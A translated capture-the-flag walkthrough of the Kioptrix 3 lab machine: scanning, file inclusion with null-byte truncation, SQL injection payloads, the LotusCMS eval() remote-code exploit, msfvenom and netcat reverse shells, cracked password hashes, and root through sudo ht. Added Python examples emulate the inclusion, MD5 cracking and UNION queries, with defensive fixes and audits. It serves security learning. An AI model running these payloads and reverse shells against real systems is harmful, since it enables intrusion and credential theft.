Information gathering

As with the previous boxes, find the target host with netdiscover.

root@kali:~# netdiscover 

Currently scanning: 192.168.194.0/16 | Screen View: Unique Hosts

13 Captured ARP Req/Rep packets, from 4 hosts. Total size: 780
_____________________________________________________________________________
IP At MAC Address Count Len MAC Vendor / Hostname
-----------------------------------------------------------------------------
192.168.43.1 ac:c1:ee:31:3f:25 6 360 Xiaomi Communications Co Ltd
192.168.43.33 44:03:2c:68:d8:0f 2 120 Intel Corporate
192.168.43.58 00:0c:29:b2:76:40 4 240 VMware, Inc.
192.168.43.158 00:0c:29:38:2d:6f 1 60 VMware, Inc.

The target IP is 192.168.43.158.

Scan the target's ports with nmap.

root@kali:~# nmap -A -sS -n 192.168.43.158
Starting Nmap 7.70 ( https://nmap.org ) at 2018-05-08 07:45 EDT
Nmap scan report for 192.168.43.158
Host is up (0.00053s latency).
Not shown: 998 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1.2 (protocol 2.0)
| ssh-hostkey:
| 1024 30:e3:f6:dc:2e:22:5d:17:ac:46:02:39:ad:71:cb:49 (DSA)
|_ 2048 9a:82:e6:96:e4:7e:d6:a6:d7:45:44:cb:19:aa:ec:dd (RSA)
80/tcp open http Apache httpd 2.2.8 ((Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch)
| http-cookie-flags:
| /:
| PHPSESSID:
|_ httponly flag not set
|_http-server-header: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch
|_http-title: Ligoat Security - Got Goat? Security ...
MAC Address: 00:0C:29:38:2D:6F (VMware)
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6
OS details: Linux 2.6.9 - 2.6.33
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT ADDRESS
1 0.53 ms 192.168.43.158

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.91 seconds

The scan tells us:

  • 22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1.2 (protocol 2.0)
  • 80/tcp open http Apache httpd 2.2.8 ((Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch)
  • OS details: Linux 2.6.9 - 2.6.33

Looking at the site on port 80, the CMS is LotusCMS.

Enumerate directories with dirb (御剑 (Yujian) works too). This turns up a phpMyAdmin install.

The CMS admin login is at http://192.168.43.158/index.php?system=Admin

Exploitation

File inclusion combined with an authenticated upload

Browse the web service on port 80.

The URL looks suspicious:

http://192.168.43.158/index.php?system=Blog

Try system=../../../../../etc/passwd

That does not work, so try a null-byte truncation (%00.). With it, /etc/passwd can be read:

http://192.168.43.158/index.php?system=../../../../../../../../etc/passwd%00.

Combined with the admin password that sqlmap recovers later (see the sqlmap section), this gives a shell.
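The null-byte behaviour above, emulated in Python as an added example (this is not code from the original post or from LotusCMS). Two things are assumed for illustration: that the application builds the include path as webroot + parameter + ".php", and that the hardened version allowlists module names. The webroot comes from the pwd output in the shell obtained later.

```python
# Added example (not from the original post): why "system=../../etc/passwd"
# failed but "system=../../etc/passwd%00." succeeded, emulated in Python.
# Assumptions for illustration: the app builds the include path as
# WEBROOT + param + ".php", and the hardened version allowlists modules.
# Neither is LotusCMS's actual code.
import posixpath
from urllib.parse import unquote

WEBROOT = "/home/www/kioptrix3.com"   # from pwd in the shell obtained later
SUFFIX = ".php"                       # assumed fixed suffix appended by the app


def vulnerable_resolve(system_param: str) -> str:
    """Emulate include($system . SUFFIX) on PHP < 5.3.4.

    Those PHP versions passed the path to the C library as a NUL-terminated
    string, so everything after the first %00 byte, including the appended
    suffix, was silently dropped. We model that by cutting at the first NUL.
    """
    decoded = unquote(system_param) + SUFFIX
    as_c_string = decoded.split("\x00", 1)[0]
    return posixpath.normpath(posixpath.join(WEBROOT, as_c_string))


ALLOWED_MODULES = {"Blog", "Admin"}   # assumed allowlist for the hardened version


class IncludeRejected(ValueError):
    pass


def hardened_resolve(system_param: str) -> str:
    """Hardened version: treat the parameter as a module *name*, not a path."""
    name = unquote(system_param)
    if "\x00" in name or "/" in name or "\\" in name or ".." in name:
        raise IncludeRejected("NUL byte or path characters in module name")
    if name not in ALLOWED_MODULES:
        raise IncludeRejected(f"unknown module {name!r}")
    return posixpath.join(WEBROOT, name + SUFFIX)


if __name__ == "__main__":
    traversal = "../../../../../../../../etc/passwd"
    print(vulnerable_resolve(traversal))           # ends in .php: no such file
    print(vulnerable_resolve(traversal + "%00."))  # /etc/passwd: readable
```

PHP 5.3.4 started rejecting NUL bytes in filesystem paths, which is why the trick depends on the old PHP 5.2.4 seen in the nmap output. The same include is what later executes the uploaded image payload: PHP runs whatever file it includes, whatever the extension.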

root@kali:~# msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.43.177 LPORT=443 -f raw > /tmp/evil.jpg
No platform was selected, choosing Msf::Module::Platform::PHP from the payload
No Arch selected, selecting Arch: php from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 1114 bytes

msfvenom generates a PHP payload disguised as an image.

Upload it through the image upload in the admin panel.

Edit an existing image entry so the upload replaces it, and note the file name it is stored under.

Start an msf listener.

Include the uploaded image through the file inclusion. This is of limited use in practice, because normally the absolute path on the server is not known; here it was only learned from the shell obtained later through the LotusCMS RCE (pwd showed /home/www/kioptrix3.com).

http://kioptrix3.com/index.php?system=../../../../../../../home/www/kioptrix3.com/gallery/photos/thumb_1a2o44437j.jpg%00.

Requesting that URL returns a shell.

msf > use multi/handler
msf exploit(multi/handler) > set PAYLOAD php/meterpreter/reverse_tcp
PAYLOAD => php/meterpreter/reverse_tcp
msf exploit(multi/handler) > set LHOST 192.168.43.177
LHOST => 192.168.43.177
msf exploit(multi/handler) > set LPORT 443
LPORT => 443
msf exploit(multi/handler) > run

[*] Started reverse TCP handler on 192.168.43.177:443
[*] Sending stage (37775 bytes) to 192.168.43.158
[*] Meterpreter session 1 opened (192.168.43.177:443 -> 192.168.43.158:51226) at 2018-05-08 12:53:09 -0400

meterpreter > ls
Listing: /home/www/kioptrix3.com
================================

Mode Size Type Last modified Name
---- ---- ---- ------------- ----
40777/rwxrwxrwx 4096 dir 2011-04-15 09:21:17 -0400 cache
40777/rwxrwxrwx 4096 dir 2011-04-14 12:24:17 -0400 core
40777/rwxrwxrwx 4096 dir 2011-04-14 12:24:17 -0400 data
100644/rw-r--r-- 23126 fil 2011-04-14 12:23:13 -0400 favicon.ico
40755/rwxr-xr-x 4096 dir 2011-04-14 11:32:31 -0400 gallery
100644/rw-r--r-- 26430 fil 2011-04-14 12:23:13 -0400 gnu-lgpl.txt
100644/rw-r--r-- 399 fil 2011-04-14 12:23:13 -0400 index.php
40777/rwxrwxrwx 4096 dir 2011-04-14 12:24:17 -0400 modules
40777/rwxrwxrwx 4096 dir 2011-04-14 12:24:17 -0400 style
100644/rw-r--r-- 243 fil 2011-04-14 12:23:13 -0400 update.php

This is a low-privileged www-data shell; many commands fail.

SQL injection with sqlmap

Some of the site's links 302-redirect to kioptrix3.com, so that name has to resolve on the attacking machine.

Add the following to /etc/hosts:

192.168.43.158  kioptrix3.com

No service restart is needed; /etc/hosts is consulted on every name lookup (restarting networking, as was done here, does no harm but is not required).

The URL kioptrix3.com/gallery/gallery.php?id=1&sort=photoid#photos is SQL-injectable.

Test it with sqlmap first: the id parameter is vulnerable to error-based injection.

Look for the admin account and password.

Database: gallery                                                                              
Table: dev_accounts
[2 entries]
+----+------------+---------------------------------------------+
| id | username | password |
+----+------------+---------------------------------------------+
| 1 | dreg | 0d3eccfb887aabd50f243b3f155c0f85 (Mast3r) |
| 2 | loneferret | 5badcaf789d3d1d09794d8f021f40f0e (starwars) |
+----+------------+---------------------------------------------+
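sqlmap cracked the two MD5 values in brackets by dictionary attack. The following is an added example (not code from the original post) that reproduces that step offline against the hashes dumped above; the wordlist is constructed for illustration, and sqlmap's is far larger.

```python
# Added example (not from the original post): an offline dictionary attack on the
# two dev_accounts hashes sqlmap dumped above. The wordlist is constructed for
# illustration; sqlmap uses a much larger one.
import hashlib
import re

# Hashes exactly as dumped from gallery.dev_accounts
DEV_ACCOUNTS = {
    "dreg": "0d3eccfb887aabd50f243b3f155c0f85",
    "loneferret": "5badcaf789d3d1d09794d8f021f40f0e",
}

# Constructed wordlist
WORDLIST = ["password", "123456", "admin", "Mast3r", "starwars", "letmein"]

_MD5_RE = re.compile(r"^[0-9a-f]{32}$")


def is_unsalted_md5(h: str) -> bool:
    """32 hex chars: the shape of a raw MD5 digest (no salt, no prefix)."""
    return bool(_MD5_RE.match(h.lower()))


def crack_md5(hashes: dict, wordlist) -> dict:
    """Return {username: plaintext} for every hash that matches a wordlist entry.

    The hashes are indexed first so each candidate word is hashed once,
    however many accounts share a password; that is what makes unsalted
    digests so cheap to attack at scale.
    """
    by_digest = {}
    for user, digest in hashes.items():
        if is_unsalted_md5(digest):
            by_digest.setdefault(digest.lower(), []).append(user)
    found = {}
    for word in wordlist:
        candidate = hashlib.md5(word.encode("utf-8")).hexdigest()
        for user in by_digest.get(candidate, ()):
            found[user] = word
    return found


if __name__ == "__main__":
    for user, pw in crack_md5(DEV_ACCOUNTS, WORDLIST).items():
        print(f"{user}: {pw}")
```

Two weaknesses compound here: dev_accounts stores unsalted MD5 (and the gallery's own user table, dumped next, stores passwords in plain text), and the recovered password for loneferret is reused for SSH, which is what the privilege escalation section relies on.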

These two accounts cannot log in to the LotusCMS admin panel. There is a second login at http://kioptrix3.com/gallery/gadmin/ (the Gallarific gallery admin), and its user table has its own credentials:

Database: gallery
Table: gallarific_users
[2 entries]
+----------+----------+
| username | password |
+----------+----------+
| admin | n0t7t1k4 |
+----------+----------+

These do log in to the gallery admin.

Although the database user is root (DBA privileges), the absolute path of the webroot is unknown, so sqlmap cannot write a shell directly.

Manual SQL injection

http://kioptrix3.com/gallery/gallery.php?id=1%20union%20select%201,2,3,4,5,6#

This establishes that the query has 6 columns, and the numbers that appear in the page show which of them are rendered.

http://kioptrix3.com/gallery/gallery.php?id=1%20union%20select%201,version(),database(),4,5,6#

This returns the MySQL version and the current database name.

http://kioptrix3.com/gallery/gallery.php?id=1%20union%20select%201,group_concat(table_name),3,4,5,6%20from%20information_schema.tables%20where%20table_schema%20=%20database()#

This lists every table name in the current database.

http://kioptrix3.com/gallery/gallery.php?id=1%20union%20select%201,group_concat(column_name),3,4,5,6%20FROM%20information_schema.columns%20WHERE%20table_name%20=0x6465765f6163636f756e7473#

This lists the columns of dev_accounts; the table name is passed as the hex literal 0x6465765f6163636f756e7473 so the payload needs no quote characters.

http://kioptrix3.com/gallery/gallery.php?id=1%20union%20select%201,group_concat(username,0x3a,password),3,4,5,6%20FROM%20dev_accounts#

This dumps username:password pairs from dev_accounts (0x3a is a colon).
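The five requests above, turned into reusable helpers as an added example (not code from the original post). Nothing here talks to the network: the HTML response used to find the rendered columns is constructed, and the BASE URL, function names and column layout are assumptions for illustration.

```python
# Added example (not from the original post): helpers for the manual UNION
# injection worked through above. Nothing here touches the network; the
# HTML response is constructed to show how the reflected columns are found.
from urllib.parse import urlencode

BASE = "http://kioptrix3.com/gallery/gallery.php"


def hex_literal(s: str) -> str:
    """MySQL hex literal: 'dev_accounts' -> 0x6465765f6163636f756e7473.

    Used for table names and separators (0x3a is ':') so the payload carries
    no quote characters, which matters when the app escapes quotes.
    """
    return "0x" + s.encode().hex()


def union_query(column_count, expressions, from_clause=None, comment="#"):
    """Build `1 union select c1,...,cN [from ...]#`.

    expressions maps 1-based column positions to SQL expressions; positions
    not listed keep their number so you can see which ones get rendered.
    """
    cols = [str(i) for i in range(1, column_count + 1)]
    for pos, expr in expressions.items():
        if not 1 <= pos <= column_count:
            raise ValueError(f"column {pos} outside 1..{column_count}")
        cols[pos - 1] = expr
    q = "1 union select " + ",".join(cols)
    if from_clause:
        q += " from " + from_clause
    return q + comment


def union_url(column_count, expressions, from_clause=None):
    """Full request URL with the payload URL-encoded in the id parameter."""
    return BASE + "?" + urlencode({"id": union_query(column_count, expressions, from_clause)})


def marker_query(column_count):
    """Step 1 with unique markers instead of bare numbers: a bare '2' can
    appear anywhere in a gallery page, the string 'col2' cannot."""
    markers = {i: hex_literal(f"col{i}") for i in range(1, column_count + 1)}
    return union_query(column_count, markers)


def reflected_columns(html, column_count):
    """Column positions from marker_query() that show up in the response."""
    return [i for i in range(1, column_count + 1) if f"col{i}" in html]


def columns_query():
    """Step 4: column names of dev_accounts, table name as a hex literal."""
    return union_query(
        6,
        {2: "group_concat(column_name)"},
        f"information_schema.columns where table_name={hex_literal('dev_accounts')}",
    )


def dump_query():
    """Step 5: username:password pairs, ':' as the hex literal 0x3a."""
    sep = hex_literal(":")
    return union_query(6, {2: f"group_concat(username,{sep},password)"}, "dev_accounts")


# Constructed response to a marker_query(6) request: the gallery template
# renders columns 2 and 3 (title and description) and drops the others.
SAMPLE_RESPONSE = """<html><body>
<h2 class="title">col2</h2>
<p class="desc">col3</p>
</body></html>"""

if __name__ == "__main__":
    print("rendered columns:", reflected_columns(SAMPLE_RESPONSE, 6))
    print(union_url(6, {2: "version()", 3: "database()"}))
    print(columns_query())
    print(dump_query())
```

The root cause is that gallery.php concatenates the id parameter into its SQL; the fix is a prepared statement with id bound as a parameter, at which point none of these payloads parse as SQL.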

LotusCMS vulnerabilities

root@kali:~# searchsploit Lotus CMS
------------------------------------------------------- ----------------------------------------
Exploit Title | Path
| (/usr/share/exploitdb/)
------------------------------------------------------- ----------------------------------------
Lotus CMS Fraise 3.0 - Local File Inclusion / Remote C | exploits/php/webapps/15964.py
Lotus Core CMS 1.0.1 - Remote File Inclusion | exploits/php/webapps/5866.txt
LotusCMS 3.0 - 'eval()' Remote Command Execution (Meta | exploits/php/remote/18565.rb
LotusCMS 3.0.3 - Multiple Vulnerabilities | exploits/php/webapps/16982.txt
------------------------------------------------------- ----------------------------------------
Shellcodes: No Result

The results include a local file inclusion and a remote code execution.

The local file inclusion is the one found earlier. Try that exploit first.

It does not seem to work.

LotusCMS 3.0 - 'eval()' Remote Command Execution is a Metasploit module (an .rb file),

so:

msf > search LotusCMS

Matching Modules
================

Name Disclosure Date Rank Description
---- --------------- ---- -----------
exploit/multi/http/lcms_php_exec 2011-03-03 excellent LotusCMS 3.0 eval() Remote Command Execution

Use this module against the target.

msf > use exploit/multi/http/lcms_php_exec 
msf exploit(multi/http/lcms_php_exec) > show options

Module options (exploit/multi/http/lcms_php_exec):

Name Current Setting Required Description
---- --------------- -------- -----------
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOST yes The target address
RPORT 80 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
URI /lcms/ yes URI
VHOST no HTTP server virtual host


Exploit target:

Id Name
-- ----
0 Automatic LotusCMS 3.0


msf exploit(multi/http/lcms_php_exec) > set RHOST 192.168.43.58
RHOST => 192.168.43.58
msf exploit(multi/http/lcms_php_exec) > set PAYLOAD generic/shell_bind_tcp
PAYLOAD => generic/shell_bind_tcp
msf exploit(multi/http/lcms_php_exec) > set URI /
URi => /
msf exploit(multi/http/lcms_php_exec) > show options

Module options (exploit/multi/http/lcms_php_exec):

Name Current Setting Required Description
---- --------------- -------- -----------
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOST 192.168.43.58 yes The target address
RPORT 80 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
URI / yes URI
VHOST no HTTP server virtual host


Payload options (generic/shell_bind_tcp):

Name Current Setting Required Description
---- --------------- -------- -----------
LPORT 4444 yes The listen port
RHOST 192.168.43.58 no The target address


Exploit target:

Id Name
-- ----
0 Automatic LotusCMS 3.0


msf exploit(multi/http/lcms_php_exec) > run

[*] Started bind handler
[-] Exploit failed [unreachable]: Rex::HostUnreachable The host (192.168.43.58:80) was unreachable.
[*] Exploit completed, but no session was created.
msf exploit(multi/http/lcms_php_exec) > set RHOST 192.168.43.158
RHOST => 192.168.43.158
msf exploit(multi/http/lcms_php_exec) > run

[*] Started bind handler
[*] Using found page param: /index.php?page=index
[*] Sending exploit ...
[*] Command shell session 1 opened (192.168.43.177:44505 -> 192.168.43.158:4444) at 2018-05-08 10:02:56 -0400

whoami
www-data
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
ls
cache
core
data
favicon.ico
gallery
gnu-lgpl.txt
index.php
modules
style
update.php
pwd
/home/www/kioptrix3.com

Trying to cd into the gallery directory from this shell does not work,

but ls -l gallery lists its contents:

ls -l gallery
total 156
drwxr-xr-x 2 root root 4096 Apr 12 2011 BACK
-rw-r--r-- 1 root root 3573 Oct 10 2009 db.sql
-rw-r--r-- 1 root root 252 Apr 12 2011 g.php
drwxr-xr-x 3 root root 4096 Apr 12 2011 gadmin
-rw-r--r-- 1 root root 214 Apr 12 2011 gallery.php
-rw-r--r-- 1 root root 1440 Apr 14 2011 gconfig.php
-rw-r--r-- 1 root root 297 Apr 12 2011 gfooter.php
-rw-r--r-- 1 root root 38771 Apr 12 2011 gfunctions.php
-rw-r--r-- 1 root root 1009 Apr 12 2011 gheader.php
-rw-r--r-- 1 root root 249 Apr 12 2011 index.php
-rw-r--r-- 1 root root 10340 Apr 12 2011 install.BAK
-rw-r--r-- 1 root root 212 Apr 12 2011 login.php
-rw-r--r-- 1 root root 213 Apr 12 2011 logout.php
-rw-r--r-- 1 root root 249 Apr 12 2011 p.php
drwxrwxrwx 2 root root 4096 Apr 12 2011 photos
-rw-r--r-- 1 root root 213 Apr 12 2011 photos.php
-rw-r--r-- 1 root root 219 Apr 12 2011 post_comment.php
-rw-r--r-- 1 root root 214 Apr 12 2011 profile.php
-rw-r--r-- 1 root root 87 Oct 10 2009 readme.html
-rw-r--r-- 1 root root 213 Apr 12 2011 recent.php
-rw-r--r-- 1 root root 215 Apr 12 2011 register.php
drwxr-xr-x 2 root root 4096 Apr 13 2011 scopbin
-rw-r--r-- 1 root root 213 Apr 12 2011 search.php
-rw-r--r-- 1 root root 216 Apr 12 2011 slideshow.php
-rw-r--r-- 1 root root 211 Apr 12 2011 tags.php
drwxr-xr-x 6 root root 4096 Apr 12 2011 themes
-rw-r--r-- 1 root root 56 Oct 10 2009 version.txt
-rw-r--r-- 1 root root 211 Apr 12 2011 vote.php

There is a gconfig.php configuration file; cat it:


$GLOBALS["gallarific_path"] = "http://kioptrix3.com/gallery";

$GLOBALS["gallarific_mysql_server"] = "localhost";
$GLOBALS["gallarific_mysql_database"] = "gallery";
$GLOBALS["gallarific_mysql_username"] = "root";
$GLOBALS["gallarific_mysql_password"] = "fuckeyou";

lotusRCE.sh

wget https://raw.githubusercontent.com/Hood3dRob1n/LotusCMS-Exploit/master/lotusRCE.sh
root@kali:~# chmod +x lotusRCE.sh
root@kali:~# ./lotusRCE.sh 192.168.43.158

Path found, now to check for vuln....

</html>Hood3dRob1n
Regex found, site is vulnerable to PHP Code Injection!

About to try and inject reverse shell....
what IP to use?
192.168.43.177
What PORT?
2333

OK, open your local listener and choose the method for back connect:
1) NetCat -e 3) NetCat Backpipe 5) Exit
2) NetCat /dev/tcp 4) NetCat FIFO
#? 1
root@kali:/tmp# nc -lvp 2333
listening on [any] 2333 ...
connect to [192.168.43.177] from kioptrix3.com [192.168.43.158] 56259
whoami
www-data
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

Privilege escalation

Try the credentials obtained from the SQL injection earlier.

Database: gallery                                                                              
Table: dev_accounts
[2 entries]
+----+------------+---------------------------------------------+
| id | username | password |
+----+------------+---------------------------------------------+
| 1 | dreg | 0d3eccfb887aabd50f243b3f155c0f85 (Mast3r) |
| 2 | loneferret | 5badcaf789d3d1d09794d8f021f40f0e (starwars) |
+----+------------+---------------------------------------------+

Log in over SSH. The first account is not much use; it cannot escalate.

Connect with the second account:

root@kali:~# ssh loneferret@192.168.43.158
loneferret@192.168.43.158's password:
Linux Kioptrix3 2.6.24-24-server #1 SMP Tue Jul 7 20:21:17 UTC 2009 i686

The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.

To access official Ubuntu documentation, please visit:
http://help.ubuntu.com/
Last login: Sat Apr 16 08:51:58 2011 from 192.168.1.106
loneferret@Kioptrix3:~$ ls
checksec.sh CompanyPolicy.README

There is a CompanyPolicy.README file.

checksec.sh  CompanyPolicy.README
loneferret@Kioptrix3:~$ cat CompanyPolicy.README
Hello new employee,
It is company policy here to use our newly installed software for editing, creating and viewing files.
Please use the command 'sudo ht'.
Failure to do so will result in you immediate termination.

DG
CEO

My English is poor; per Baidu Translate, it says files can be edited and created with sudo ht.

Trying it from Kali:

loneferret@Kioptrix3:~$ sudo ht
Error opening terminal: xterm-256color.

It fails to open an xterm-256color terminal: the target has no terminfo entry for that terminal type, which Kali's terminal advertises in TERM. Setting TERM to a type the target knows (such as xterm) before running sudo ht avoids the error.

Connecting from a local xshell session instead, it opens fine.

Press F3 to open a file; enter /etc/passwd or /etc/sudoers to edit it.

Either change the current user's entry in /etc/passwd to uid 0 and gid 0, the same as root,

or add a rule to /etc/sudoers giving the current user the same rights as root. (Editing /etc/sudoers by hand is risky: a syntax error locks everyone out of sudo, which is what visudo guards against.)

Log in again over SSH.
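What the two edits made through sudo ht look like on disk, and the check a defender would run over the same files, as an added example (not code from the original post). The sample /etc/passwd and /etc/sudoers contents are constructed; the real files on the box differ.

```python
# Added example (not from the original post): the two attacker edits made via
# `sudo ht`, and a defender's audit of the same files. Sample contents are
# constructed for illustration.
import re

PASSWD_SAMPLE = """root:x:0:0:root:/root:/bin/bash
www-data:x:33:33:www-data:/var/www:/bin/sh
loneferret:x:1000:100:loneferret,,,:/home/loneferret:/bin/bash
dreg:x:1001:100:dreg,,,:/home/dreg:/bin/rbash
"""

SUDOERS_SAMPLE = """Defaults env_reset
root        ALL=(ALL) ALL
loneferret  ALL=(ALL) NOPASSWD: /usr/local/bin/ht
"""

# Binaries that read/write arbitrary files or spawn a shell: sudo rights on
# any of them are equivalent to root. ht is the one this box hands out.
EDITOR_OR_SHELL = {"ht", "vi", "vim", "nano", "less", "more", "su",
                   "sh", "bash", "find", "awk", "python"}


def make_uid0(passwd_text, user):
    """Attacker edit #1: turn `user` into a second uid 0 / gid 0 account."""
    out = []
    for line in passwd_text.splitlines():
        fields = line.split(":")
        if len(fields) == 7 and fields[0] == user:
            fields[2], fields[3] = "0", "0"
        out.append(":".join(fields))
    return "\n".join(out) + "\n"


def grant_full_sudo(sudoers_text, user):
    """Attacker edit #2: append an unrestricted sudo rule for `user`."""
    return sudoers_text.rstrip("\n") + f"\n{user}\tALL=(ALL) ALL\n"


def audit_passwd(passwd_text):
    """Defender check: every uid-0 account that is not literally 'root'."""
    hits = []
    for line in passwd_text.splitlines():
        fields = line.split(":")
        if len(fields) == 7 and fields[2] == "0" and fields[0] != "root":
            hits.append(fields[0])
    return hits


def audit_sudoers(sudoers_text):
    """Defender check: non-root principals with ALL, NOPASSWD, or editor/shell rights."""
    findings = []
    for line in sudoers_text.splitlines():
        line = line.split("#", 1)[0].strip()
        if not line or line.startswith("Defaults"):
            continue
        parts = line.split(None, 1)
        if len(parts) != 2 or parts[0] == "root":
            continue
        user, spec = parts
        # Drop the "hosts=(runas)" prefix to leave only the command list.
        cmds = spec.split("=", 1)[1] if "=" in spec else spec
        cmds = re.sub(r"^\([^)]*\)\s*", "", cmds)
        if "NOPASSWD" in cmds:
            findings.append((user, "NOPASSWD"))
        cmds = re.sub(r"\b(NOPASSWD|PASSWD|SETENV|NOEXEC):", "", cmds)
        for cmd in cmds.split(","):
            cmd = cmd.strip()
            if not cmd:
                continue
            if cmd == "ALL":
                findings.append((user, "ALL commands"))
            elif cmd.split()[0].rsplit("/", 1)[-1] in EDITOR_OR_SHELL:
                findings.append((user, f"editor/shell via sudo: {cmd}"))
    return findings


if __name__ == "__main__":
    print("before:", audit_passwd(PASSWD_SAMPLE), audit_sudoers(SUDOERS_SAMPLE))
    print("after: ", audit_passwd(make_uid0(PASSWD_SAMPLE, "loneferret")),
          audit_sudoers(grant_full_sudo(SUDOERS_SAMPLE, "loneferret")))
```

The passwd edit is the one whose result the next SSH login shows: loneferret keeps the same password, but logs in as uid 0 with gid 0 plus the users group, which is exactly the id output below. The audit flags the original misconfiguration too: any sudo rule for an editor is already a root grant, whether or not NOPASSWD is set.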

root@kali:~# ssh loneferret@192.168.43.158
loneferret@192.168.43.158's password:
Last login: Tue May 8 19:27:01 2018 from uknow-pc
Linux Kioptrix3 2.6.24-24-server #1 SMP Tue Jul 7 20:21:17 UTC 2009 i686

The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.

To access official Ubuntu documentation, please visit:
http://help.ubuntu.com/
root@Kioptrix3:~# id
uid=0(root) gid=0(root) groups=0(root),100(users)
root@Kioptrix3:~# whoami
root

We now have root.

Summary

This exercise took quite a while and turned up issues in several places. First, having found phpMyAdmin, I tried to get a shell by writing to the MySQL log, but the general_log variable did not exist in phpMyAdmin's variable list.

Second, there is the SQL injection, which sqlmap can exploit, and it runs as root. I tried os-shell to write a shell, using the absolute path obtained from the remote command execution, but it still would not write; it appears to be a directory permissions problem.

INTO OUTFILE from phpMyAdmin also failed, with #1 - Can't create/write to file. The command execution shell likewise showed that the directory is not writable.

Finally, I added the file inclusion plus admin upload combination: including an uploaded image webshell through the LFI gives a shell. Limited as it is, it still feels rather neat.

I wanted to try as many approaches as possible, but the lab environment is limited. I still learned a lot; after several VulnHub boxes, I feel I have learned a great deal about privilege escalation in particular.

Although these environments are somewhat unusual, even odd, I picked up knowledge of Linux along the way that I had been lacking.